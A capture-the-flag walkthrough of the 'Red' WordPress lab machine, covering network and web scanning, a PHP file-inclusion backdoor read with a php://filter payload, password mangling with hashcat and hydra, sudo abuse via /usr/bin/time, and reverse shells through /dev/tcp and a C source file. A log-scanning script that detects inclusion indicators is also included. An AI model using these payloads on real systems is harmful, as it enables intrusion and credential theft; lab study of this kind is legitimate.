1. Information gathering
arp-scan -l
┌──(root㉿kali)-[~/kali/red]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.9.22
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 d4:8f:a2:9f:51:49 Huawei Device Co., Ltd.
192.168.9.4 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.9.32 08:00:27:89:06:41 PCS Systemtechnik GmbH
nmap -sn 192.168.9.0/24
┌──(root㉿kali)-[~/kali/red]
└─# nmap -sn 192.168.9.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-18 00:51 EST
Nmap scan report for 192.168.9.2
Host is up (0.0028s latency).
MAC Address: D4:8F:A2:9F:51:49 (Huawei Device)
Nmap scan report for 192.168.9.32
Host is up (0.00080s latency).
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.9.22
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 2.64 seconds
Port scanning
nmap -sC -sV -sT -A 192.168.9.32 --min-rate 10000
┌──(root㉿kali)-[~/kali/red]
└─# nmap -sC -sV -sT -A 192.168.9.32 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-18 00:59 EST
Nmap scan report for redrocks.win (192.168.9.32)
Host is up (0.00093s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8d5365835252c4127249be335dd1e71c (RSA)
| 256 06610a49864364cab00c0f09177b33ba (ECDSA)
|_ 256 9b8d90472ac1dc11287d57e08a23b469 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...
|_http-generator: WordPress 5.8.1
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms redrocks.win (192.168.9.32)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.51 seconds
Framework fingerprinting
┌──(root㉿kali)-[~/kali/red]
└─# whatweb http://192.168.9.32
http://192.168.9.32 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.9.32], MetaGenerator[WordPress 5.8.1], PoweredBy[--], Script, Title[Hacked By Red – Your site has been Hacked! You’ll never find the backdoor hahahah], UncommonHeaders[link], WordPress[5.8.1]
We can see the site runs the WordPress framework, version 5.8.1.
┌──(root㉿kali)-[/home/kali/kali]
└─# wpscan --url "http://192.168.9.32" -e u
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[+] URL: http://192.168.9.32/ [192.168.9.32]
[+] Started: Mon Dec 18 01:08:51 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.9.32/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.9.32/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.9.32/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.9.32/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.9.32/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.9.32/, Match: 'WordPress 5.8.1'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] administrator
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.9.32/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Dec 18 01:08:53 2023
[+] Requests Done: 46
[+] Cached Requests: 5
[+] Data Sent: 11.932 KB
[+] Data Received: 133.691 KB
[+] Memory used: 156.277 MB
[+] Elapsed time: 00:00:01
Directory scanning
┌──(root㉿kali)-[/home/kali/kali]
└─# dirsearch -u "http://192.168.9.32"
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/kali/reports/http_192.168.9.32/_23-12-18_01-11-15.txt
Target: http://192.168.9.32/
[01:11:15] Starting:
[01:11:16] 301 - 0B - /%2e%2e//google.com -> http://192.168.9.32/%2e%2e/google.com
[01:11:19] 403 - 339B - /.git
[01:11:19] 403 - 339B - /.git/
[01:11:19] 403 - 339B - /.git/COMMIT_EDITMSG
[01:11:19] 403 - 339B - /.git/branches/
[01:11:19] 403 - 339B - /.git/config
[01:11:19] 403 - 339B - /.git/head
[01:11:19] 403 - 339B - /.git/HEAD
[01:11:19] 403 - 339B - /.git/FETCH_HEAD
[01:11:19] 403 - 339B - /.git/description
[01:11:19] 403 - 339B - /.git/hooks/
[01:11:20] 403 - 339B - /.git/hooks/commit-msg
[01:11:19] 403 - 339B - /.git/hooks/applypatch-msg
[01:11:20] 403 - 339B - /.git/hooks/post-update
[01:11:20] 403 - 339B - /.git/hooks/pre-commit
[01:11:20] 403 - 339B - /.git/index
[01:11:20] 403 - 339B - /.git/hooks/pre-applypatch
[01:11:20] 403 - 339B - /.git/hooks/pre-push
[01:11:20] 403 - 339B - /.git/hooks/prepare-commit-msg
[01:11:20] 403 - 339B - /.git/hooks/pre-receive
[01:11:20] 403 - 339B - /.git/hooks/update
[01:11:20] 403 - 339B - /.git/info/attributes
[01:11:20] 403 - 339B - /.git/info/refs
[01:11:20] 403 - 339B - /.git/logs/refs
[01:11:20] 403 - 339B - /.git/logs/HEAD
[01:11:20] 403 - 339B - /.git/hooks/pre-rebase
[01:11:20] 403 - 339B - /.git/info/
[01:11:20] 403 - 339B - /.git/objects/
[01:11:20] 403 - 339B - /.git/logs/
[01:11:20] 403 - 339B - /.git/refs/heads
[01:11:20] 403 - 339B - /.git/logs/refs/heads
[01:11:20] 403 - 339B - /.git/objects/info/packs
[01:11:20] 403 - 339B - /.git/refs/heads/master
[01:11:20] 403 - 339B - /.git/info/exclude
[01:11:20] 403 - 339B - /.git/logs/refs/heads/master
[01:11:20] 403 - 339B - /.git/logs/refs/remotes/origin/HEAD
[01:11:20] 403 - 339B - /.git/refs/remotes
[01:11:20] 403 - 339B - /.git/logs/refs/remotes/origin
[01:11:20] 403 - 339B - /.git/refs/tags
[01:11:20] 403 - 339B - /.git/refs/remotes/origin/master
[01:11:20] 403 - 339B - /.git/logs/head
[01:11:20] 403 - 339B - /.git/logs/refs/remotes/origin/master
[01:11:20] 403 - 339B - /.git/refs/remotes/origin/HEAD
[01:11:20] 403 - 339B - /.git/refs/remotes/origin
[01:11:20] 403 - 339B - /.git/refs/
[01:11:20] 403 - 339B - /.git/logs/refs/remotes
[01:11:20] 403 - 339B - /.git/packed-refs
[01:11:20] 403 - 277B - /.ht_wsr.txt
[01:11:20] 403 - 277B - /.htaccess.bak1
[01:11:20] 403 - 277B - /.htaccess.sample
[01:11:20] 403 - 277B - /.htaccess.save
[01:11:20] 403 - 277B - /.htaccess.orig
[01:11:20] 403 - 277B - /.htaccessOLD2
[01:11:20] 403 - 277B - /.htaccess_sc
[01:11:20] 403 - 277B - /.htaccess_extra
[01:11:20] 403 - 277B - /.htm
[01:11:20] 403 - 277B - /.htaccessBAK
[01:11:20] 403 - 277B - /.htpasswd_test
[01:11:20] 403 - 277B - /.htaccess_orig
[01:11:20] 403 - 277B - /.html
[01:11:20] 403 - 277B - /.htpasswds
[01:11:20] 403 - 277B - /.htaccessOLD
[01:11:20] 403 - 277B - /.httr-oauth
[01:11:23] 403 - 277B - /.php
[01:11:27] 301 - 0B - /0 -> http://192.168.9.32/0/
[01:11:34] 301 - 0B - /adm/index.php -> http://192.168.9.32/adm/
[01:11:34] 302 - 0B - /admin -> http://redrocks.win/wp-admin/
[01:11:34] 301 - 0B - /admin. -> http://192.168.9.32/admin
[01:11:35] 302 - 0B - /admin/ -> http://redrocks.win/wp-admin/
[01:11:35] 301 - 0B - /admin/index.php -> http://192.168.9.32/admin/
[01:11:36] 301 - 0B - /admin/mysql/index.php -> http://192.168.9.32/admin/mysql/
[01:11:36] 301 - 0B - /admin/mysql2/index.php -> http://192.168.9.32/admin/mysql2/
[01:11:36] 301 - 0B - /admin/phpmyadmin2/index.php -> http://192.168.9.32/admin/phpmyadmin2/
[01:11:36] 301 - 0B - /admin/phpmyadmin/index.php -> http://192.168.9.32/admin/phpmyadmin/
[01:11:36] 301 - 0B - /admin/PMA/index.php -> http://192.168.9.32/admin/PMA/
[01:11:36] 301 - 0B - /admin/phpMyAdmin/index.php -> http://192.168.9.32/admin/phpMyAdmin/
[01:11:36] 301 - 0B - /admin/pma/index.php -> http://192.168.9.32/admin/pma/
[01:11:36] 301 - 0B - /admin2/index.php -> http://192.168.9.32/admin2/
[01:11:37] 301 - 0B - /admin_area/index.php -> http://192.168.9.32/admin_area/
[01:11:42] 301 - 0B - /adminarea/index.php -> http://192.168.9.32/adminarea/
[01:11:42] 301 - 0B - /admincp/index.php -> http://192.168.9.32/admincp/
[01:11:43] 301 - 0B - /adminer/index.php -> http://192.168.9.32/adminer/
[01:11:44] 301 - 0B - /administrator/index.php -> http://192.168.9.32/administrator/
[01:11:47] 301 - 0B - /apc/index.php -> http://192.168.9.32/apc/
[01:11:49] 301 - 0B - /asset.. -> http://192.168.9.32/asset
[01:11:49] 301 - 0B - /atom -> http://192.168.9.32/feed/atom/
[01:11:50] 301 - 0B - /axis2//axis2-web/HappyAxis.jsp -> http://192.168.9.32/axis2/axis2-web/HappyAxis.jsp
[01:11:50] 301 - 0B - /axis//happyaxis.jsp -> http://192.168.9.32/axis/happyaxis.jsp
[01:11:50] 301 - 0B - /axis2-web//HappyAxis.jsp -> http://192.168.9.32/axis2-web/HappyAxis.jsp
[01:11:51] 301 - 0B - /bb-admin/index.php -> http://192.168.9.32/bb-admin/
[01:11:51] 301 - 0B - /bitrix/admin/index.php -> http://192.168.9.32/bitrix/admin/
[01:11:54] 301 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://192.168.9.32/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[01:11:55] 301 - 0B - /claroline/phpMyAdmin/index.php -> http://192.168.9.32/claroline/phpMyAdmin/
[01:11:59] 302 - 0B - /dashboard -> http://redrocks.win/wp-admin/
[01:11:59] 302 - 0B - /dashboard/ -> http://redrocks.win/wp-admin/
[01:12:00] 301 - 0B - /db/index.php -> http://192.168.9.32/db/
[01:12:00] 301 - 0B - /dbadmin/index.php -> http://192.168.9.32/dbadmin/
[01:12:03] 301 - 0B - /engine/classes/swfupload//swfupload_f9.swf -> http://192.168.9.32/engine/classes/swfupload/swfupload_f9.swf
[01:12:04] 301 - 0B - /engine/classes/swfupload//swfupload.swf -> http://192.168.9.32/engine/classes/swfupload/swfupload.swf
[01:12:04] 301 - 0B - /etc/lib/pChart2/examples/imageMap/index.php -> http://192.168.9.32/etc/lib/pChart2/examples/imageMap/
[01:12:05] 301 - 0B - /extjs/resources//charts.swf -> http://192.168.9.32/extjs/resources/charts.swf
[01:12:05] 302 - 0B - /favicon.ico -> http://redrocks.win/wp-includes/images/w-logo-blue-white-bg.png
[01:12:06] 301 - 0B - /feed -> http://192.168.9.32/feed/
[01:12:10] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> http://192.168.9.32/html/js/misc/swfupload/swfupload.swf
[01:12:11] 301 - 0B - /index.php -> http://192.168.9.32/
[01:12:11] 301 - 0B - /index.php/login/ -> http://192.168.9.32/login/
[01:12:12] 301 - 0B - /install/index.php?upgrade/ -> http://192.168.9.32/install/?upgrade/
[01:12:13] 301 - 0B - /jkstatus; -> http://192.168.9.32/jkstatus
[01:12:15] 200 - 7KB - /license.txt
[01:12:16] 302 - 0B - /login -> http://redrocks.win/wp-login.php
[01:12:16] 302 - 0B - /login/ -> http://redrocks.win/wp-login.php
[01:12:16] 301 - 0B - /login.wdm%20 -> http://192.168.9.32/login.wdm
[01:12:20] 301 - 0B - /modelsearch/index.php -> http://192.168.9.32/modelsearch/
[01:12:21] 301 - 0B - /myadmin/index.php -> http://192.168.9.32/myadmin/
[01:12:21] 301 - 0B - /myadmin2/index.php -> http://192.168.9.32/myadmin2/
[01:12:22] 301 - 0B - /mysql-admin/index.php -> http://192.168.9.32/mysql-admin/
[01:12:22] 301 - 0B - /mysql/index.php -> http://192.168.9.32/mysql/
[01:12:22] 301 - 0B - /mysqladmin/index.php -> http://192.168.9.32/mysqladmin/
[01:12:22] 301 - 0B - /New%20folder%20(2) -> http://192.168.9.32/New%20folder%20(2
[01:12:25] 301 - 0B - /panel-administracion/index.php -> http://192.168.9.32/panel-administracion/
[01:12:26] 301 - 0B - /phpadmin/index.php -> http://192.168.9.32/phpadmin/
[01:12:27] 301 - 0B - /phpma/index.php -> http://192.168.9.32/phpma/
[01:12:27] 301 - 0B - /phpmyadmin!! -> http://192.168.9.32/phpmyadmin
[01:12:28] 301 - 0B - /phpMyAdmin.old/index.php -> http://192.168.9.32/phpMyAdmin.old/
[01:12:28] 301 - 0B - /phpmyadmin-old/index.php -> http://192.168.9.32/phpmyadmin-old/
[01:12:28] 301 - 0B - /phpMyAdmin/index.php -> http://192.168.9.32/phpMyAdmin/
[01:12:28] 301 - 0B - /phpmyadmin/index.php -> http://192.168.9.32/phpmyadmin/
[01:12:28] 301 - 0B - /phpmyadmin0/index.php -> http://192.168.9.32/phpmyadmin0/
[01:12:28] 301 - 0B - /phpMyAdmin/phpMyAdmin/index.php -> http://192.168.9.32/phpMyAdmin/phpMyAdmin/
[01:12:28] 301 - 0B - /phpmyadmin/phpmyadmin/index.php -> http://192.168.9.32/phpmyadmin/phpmyadmin/
[01:12:28] 301 - 0B - /phpmyadmin1/index.php -> http://192.168.9.32/phpmyadmin1/
[01:12:28] 301 - 0B - /phpmyadmin2/index.php -> http://192.168.9.32/phpmyadmin2/
[01:12:28] 301 - 0B - /phpMyadmin_bak/index.php -> http://192.168.9.32/phpMyadmin_bak/
[01:12:28] 301 - 0B - /phpMyAdminold/index.php -> http://192.168.9.32/phpMyAdminold/
[01:12:29] 301 - 0B - /pma-old/index.php -> http://192.168.9.32/pma-old/
[01:12:29] 301 - 0B - /PMA/index.php -> http://192.168.9.32/PMA/
[01:12:29] 301 - 0B - /pma/index.php -> http://192.168.9.32/pma/
[01:12:29] 301 - 0B - /PMA2/index.php -> http://192.168.9.32/PMA2/
[01:12:30] 301 - 0B - /pmamy/index.php -> http://192.168.9.32/pmamy/
[01:12:30] 301 - 0B - /pmamy2/index.php -> http://192.168.9.32/pmamy2/
[01:12:30] 301 - 0B - /pmd/index.php -> http://192.168.9.32/pmd/
[01:12:32] 301 - 0B - /rating_over. -> http://192.168.9.32/rating_over
[01:12:32] 200 - 3KB - /readme.html
[01:12:34] 200 - 108B - /robots.txt
[01:12:34] 301 - 0B - /roundcube/index.php -> http://192.168.9.32/roundcube/
[01:12:34] 301 - 0B - /rss -> http://192.168.9.32/feed/
[01:12:35] 403 - 277B - /server-status
[01:12:35] 403 - 277B - /server-status/
[01:12:38] 301 - 0B - /siteadmin/index.php -> http://192.168.9.32/siteadmin/
[01:12:38] 302 - 0B - /sitemap.xml -> http://redrocks.win/wp-sitemap.xml
[01:12:39] 301 - 0B - /sql/index.php -> http://192.168.9.32/sql/
[01:12:40] 301 - 0B - /static.. -> http://192.168.9.32/static
[01:12:41] 301 - 0B - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates -> http://192.168.9.32/sugarcrm/?module=Accounts&action=ShowDuplicates
[01:12:41] 301 - 0B - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates -> http://192.168.9.32/sugarcrm/?module=Contacts&action=ShowDuplicates
[01:12:43] 301 - 0B - /templates/rhuk_milkyway/index.php -> http://192.168.9.32/templates/rhuk_milkyway/
[01:12:43] 301 - 0B - /templates/beez/index.php -> http://192.168.9.32/templates/beez/
[01:12:43] 301 - 0B - /templates/ja-helio-farsi/index.php -> http://192.168.9.32/templates/ja-helio-farsi/
[01:12:45] 301 - 0B - /tmp/index.php -> http://192.168.9.32/tmp/
[01:12:45] 301 - 0B - /tools/phpMyAdmin/index.php -> http://192.168.9.32/tools/phpMyAdmin/
[01:12:46] 301 - 0B - /typo3/phpmyadmin/index.php -> http://192.168.9.32/typo3/phpmyadmin/
[01:12:51] 301 - 0B - /web/phpMyAdmin/index.php -> http://192.168.9.32/web/phpMyAdmin/
[01:12:51] 301 - 0B - /webadmin/index.php -> http://192.168.9.32/webadmin/
[01:12:52] 301 - 315B - /wp-admin -> http://192.168.9.32/wp-admin/
[01:12:52] 200 - 0B - /wp-config.php
[01:12:52] 302 - 0B - /wp-admin/ -> http://redrocks.win/wp-login.php?redirect_to=http%3A%2F%2F192.168.9.32%2Fwp-admin%2F&reauth=1
[01:12:52] 400 - 1B - /wp-admin/admin-ajax.php
[01:12:53] 200 - 0B - /wp-content/
[01:12:53] 301 - 317B - /wp-content -> http://192.168.9.32/wp-content/
[01:12:53] 409 - 3KB - /wp-admin/setup-config.php
[01:12:53] 200 - 509B - /wp-admin/install.php
[01:12:53] 500 - 609B - /wp-content/plugins/akismet/akismet.php
[01:12:53] 500 - 0B - /wp-content/plugins/hello.php
[01:12:53] 403 - 277B - /wp-content/upgrade/
[01:12:53] 403 - 277B - /wp-content/uploads/
[01:12:53] 500 - 609B - /wp-content/plugins/akismet/admin.php
[01:12:53] 301 - 0B - /wp-content/plugins/adminer/inc/editor/index.php -> http://192.168.9.32/wp-content/plugins/adminer/inc/editor/
[01:12:53] 301 - 318B - /wp-includes -> http://192.168.9.32/wp-includes/
[01:12:53] 200 - 0B - /wp-cron.php
[01:12:53] 403 - 277B - /wp-includes/
[01:12:53] 200 - 110KB - /wp-json/
[01:12:53] 200 - 595B - /wp-json/wp/v2/users/
[01:12:53] 200 - 0B - /wp-includes/rss-functions.php
[01:12:53] 301 - 0B - /wp-register.php -> http://redrocks.win/wp-login.php?action=register
[01:12:53] 302 - 0B - /wp-signup.php -> http://redrocks.win/wp-login.php?action=register
[01:12:53] 200 - 2KB - /wp-login.php
[01:12:54] 301 - 0B - /www/phpMyAdmin/index.php -> http://192.168.9.32/www/phpMyAdmin/
[01:12:54] 405 - 42B - /xmlrpc.php
[01:12:54] 301 - 0B - /xampp/phpmyadmin/index.php -> http://192.168.9.32/xampp/phpmyadmin/
Most of the scan results are 301 redirects; if you follow them, the browser just keeps spinning forever.
So we add redrocks.win to the hosts file so the name resolves:
vim /etc/hosts
192.168.9.32 redrocks.win
2. Exploitation
The banner on the page tells us the site has already been compromised and that we need to find the backdoor, so scan it with gobuster, looking for files with the .php extension:
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.9.32 -x php -t 30
Brute forcing finds NetworkFileManagerPHP.php.
File inclusion
Visiting it returns a blank page, which means the file is being parsed as PHP. Guessing it is a file inclusion vulnerability, use wfuzz to find out which parameter it accepts.
The parameter is key. Passing ?key=../../../../../etc/passwd returns output, so next read wp-config.php;
in a WordPress install, wp-config.php normally contains the database username and password.
Because a PHP file would be executed rather than displayed, we read it through the php:// filter wrapper directly:
http://192.168.9.32/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php
Decoding gives: john R3v_m4lwh3r3_k1nG!!
SSH login
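As an added defensive illustration that is not part of the original write-up, the following Python script scans Apache access-log lines for the inclusion indicators used above: ../ traversal (plain, URL-encoded or double-encoded), php:// wrappers, and reads of /etc/passwd or wp-config.php. The log lines are constructed samples in Common Log Format modelled on this walkthrough's requests, not logs from the target.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample Apache access-log lines (Common Log Format) modelled on the
# requests made in this walkthrough; they are illustrative, not real target logs.
SAMPLE_LOG = r"""
192.168.9.22 - - [18/Dec/2023:01:20:01 -0500] "GET /NetworkFileManagerPHP.php HTTP/1.1" 200 0
192.168.9.22 - - [18/Dec/2023:01:20:05 -0500] "GET /NetworkFileManagerPHP.php?key=../../../../../etc/passwd HTTP/1.1" 200 2301
192.168.9.22 - - [18/Dec/2023:01:20:09 -0500] "GET /NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php HTTP/1.1" 200 4120
192.168.9.22 - - [18/Dec/2023:01:20:12 -0500] "GET /NetworkFileManagerPHP.php?key=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2301
192.168.9.4 - - [18/Dec/2023:01:21:00 -0500] "GET /wp-login.php HTTP/1.1" 200 2089
192.168.9.4 - - [18/Dec/2023:01:21:03 -0500] "GET /?p=1 HTTP/1.1" 200 5012
""".strip()

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of file-inclusion abuse, evaluated on the fully decoded parameter value.
CHECKS = [
    ("path-traversal", re.compile(r"(\.\./|\.\.\\)")),
    ("php-wrapper", re.compile(r"\bphp://", re.I)),
    ("sensitive-file", re.compile(r"(/etc/passwd|/etc/shadow|wp-config\.php)", re.I)),
]


def decode_fully(value):
    # parse_qs already decoded once; decode twice more so that single- and
    # double-encoded payloads (%2e%2e%2f, %252e%252e%252f) are both caught.
    return unquote(unquote(value))


def analyse_line(line):
    """Return an alert dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlsplit(m.group("target"))
    findings = []
    for name, values in parse_qs(parsed.query, keep_blank_values=True).items():
        for value in values:
            decoded = decode_fully(value)
            hits = [label for label, rx in CHECKS if rx.search(decoded)]
            if hits:
                findings.append({"param": name, "value": decoded, "indicators": hits})
    if not findings:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parsed.path,
            "status": int(m.group("status")), "findings": findings}


def scan_log(text):
    """Scan every line of an access log and return the list of alerts."""
    return [a for a in (analyse_line(l) for l in text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for f in alert["findings"]:
            print(f'{alert["ts"]} {alert["ip"]} {alert["path"]} '
                  f'{f["param"]}={f["value"]!r} -> {", ".join(f["indicators"])}')
```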
It will not connect, so the password must be wrong, even though a password was given.
Guessing that the characters are out of order, use hashcat's best64.rule:
1. First put the original password into 123.txt.
2. hashcat --stdout 123.txt -r /usr/share/hashcat/rules/best64.rule > pass.txt
hashcat: the command-line password-cracking utility.
--stdout: tells hashcat to print the generated password candidates to standard output instead of attempting to crack anything.
123.txt: the input wordlist containing the candidate passwords.
-r /usr/share/hashcat/rules/best64.rule: specifies the path to a rule file (best64.rule here), whose mangling rules are applied to every word in the wordlist to generate variants.
> pass.txt: redirects the generated candidates from standard output into the file pass.txt.
Brute force with hydra
echo 'R3v_m4lwh3r3_k1nG!!' > 123.txt
In an interactive bash shell the exclamation marks trigger history expansion, so either single-quote the string as above or put a \ before each exclamation mark.
3. Privilege escalation
After connecting, the session drops automatically after a while and the password is changed, so after every disconnect you have to brute force it again.
When you run cat, it opens vi edit mode, and the reverse also holds:
cat and vi have been swapped.
sudo -l
We find that /usr/bin/time can only be run as the ippsec user.
sudo -u ippsec /usr/bin/time /bin/bash
This switches to the ippsec user.
sudo: run a command as the superuser or as another user. Here it runs the following command with the ippsec user's privileges.
-u ippsec: specifies the user to switch to, here ippsec.
/usr/bin/time: the time command in /usr/bin/.
/bin/bash: starts a new Bash shell.
Reverse shell
sudo -u ippsec /usr/bin/time /bin/bash
dash -i >& /dev/tcp/192.168.9.22/6666 0>&1
python3 -c 'import pty;pty.spawn("/bin/bash")'
So I suggest preparing these commands in advance and pasting them in directly.
The session drops very quickly, but once we are the ippsec user through the reverse shell,
the reverse shell stays up even when the terminal session is dropped.
find / -group ippsec -type d 2>/dev/null | grep -v proc
Look at what the current user ippsec has access to.
Root privileges
1. First cd to the tmp directory, then cd to /var/www/wordpress/.git.
ippsec@red:/var/www/wordpress$ cd .git
cd .git
ippsec@red:/var/www/wordpress/.git$ ls
ls
rev supersecretfileuc.c
2. rev is an executable file, so the idea is to replace supersecretfileuc.c with a reverse-shell source file.
Delete the original rev and supersecretfileuc.c.
Create supersecretfileuc.c containing the reverse shell.
Change the settings to your own IP address and port.
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void) {
    int port = 6666;                                         /* listener port on Kali */
    struct sockaddr_in revsockaddr;
    int sockt = socket(AF_INET, SOCK_STREAM, 0);

    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.9.22"); /* Kali IP address */

    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));

    /* Point stdin, stdout and stderr at the socket */
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    /* execve() does not search PATH, so the shell needs its absolute path */
    char * const argv[] = {"dash", NULL};
    execve("/bin/dash", argv, NULL);
    return 0;
}
After writing it, just wait for rev to run automatically.
Kali must be listening on the port beforehand.